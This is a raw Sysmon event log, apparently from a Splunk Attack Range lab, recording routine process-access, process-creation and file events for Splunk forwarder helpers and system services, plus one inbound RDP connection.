08:10:24.967{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810823Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.967{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810822Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:24.967{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810821Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.967{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810820Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:24.967{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F8F0-60EB-F279-00000000D001}1656C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810819Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.967{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F8F0-60EB-F279-00000000D001}1656C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810818Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.952{0C1E0330-F8F0-60EB-F279-00000000D001}1656C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810817Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.576{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BDB5FDDDCE5635ADC4AF7171E697075,SHA256=56693F098BD866633E11487A7F4B05B6DDB6D193BD5DC908CBF3DE14599721A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055518Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:24.085{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=667860EB182DE6CC63C0383016134F19,SHA256=AECD81CC681C5C2FEBAA5F214A1BE4F695B6B6836067240643F1839C9F915CCF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810816Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.435{0C1E0330-F8F0-60EB-F179-00000000D001}1721892C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000810815Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:22.299{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.218-24168-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 10341000x8000000000000000810814Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.279{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F8F0-60EB-F179-00000000D001}172C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810813Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:24.279{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810812Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.279{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810811Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:24.279{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810810Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.279{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810809Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:24.279{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810808Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.279{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810807Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:24.279{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810806Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.279{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810805Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:24.279{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810804Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.279{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F8F0-60EB-F179-00000000D001}172C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810803Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.279{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F8F0-60EB-F179-00000000D001}172C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810802Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.264{0C1E0330-F8F0-60EB-F179-00000000D001}172C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000810845Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:25.654{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F8F1-60EB-F379-00000000D001}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000810844Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:25.654{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810843Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:25.654{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000810842Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:25.654{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810841Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 